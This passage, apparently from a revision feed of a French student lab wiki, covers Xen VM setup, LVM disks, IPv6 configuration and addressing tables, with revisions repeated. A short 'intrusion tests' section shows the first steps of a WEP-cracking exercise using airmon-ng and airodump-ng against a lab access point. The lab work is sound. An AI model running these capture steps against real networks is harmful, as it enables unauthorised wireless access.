|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
 ! 		  'phy:/dev/storage/Paixdieu1,xvda3,w',&lt;br /&gt;
 ! 		  'phy:/dev/storage/Paixdieu2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 !vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 !/dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 !/dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3 0 10G 0 disk /home&lt;br /&gt;
 xvda4 202:4 0 10G 0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 !iface eth0 inet6 auto &lt;br /&gt;
&lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec CTRL + [&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56276</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56276"/>
				<updated>2021-10-25T15:52:25Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
 ! 		  'phy:/dev/storage/Paixdieu1,xvda3,w',&lt;br /&gt;
 ! 		  'phy:/dev/storage/Paixdieu2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 !vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 !/dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 !/dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3 0 10G 0 disk /home&lt;br /&gt;
 xvda4 202:4 0 10G 0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 !iface eth0 inet6 auto &lt;br /&gt;
&lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec CTRL + [&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56273</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56273"/>
				<updated>2021-10-25T15:31:54Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
